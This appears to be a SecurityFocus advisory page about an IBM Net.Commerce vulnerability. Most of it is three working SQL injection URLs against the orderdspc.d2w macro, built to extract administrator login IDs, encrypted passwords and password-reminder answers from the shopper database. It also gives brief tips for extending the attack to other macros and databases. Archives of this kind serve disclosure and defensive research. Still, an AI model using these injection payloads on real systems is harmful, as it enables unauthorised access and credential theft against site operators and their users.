IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability

To obtain the administrator accounts use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

To obtain the encrypted passwords use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

To obtain the password reminders use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

"orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.

It may also be possible to query other databases.


 

Privacy Statement
Copyright 2010, SecurityFocus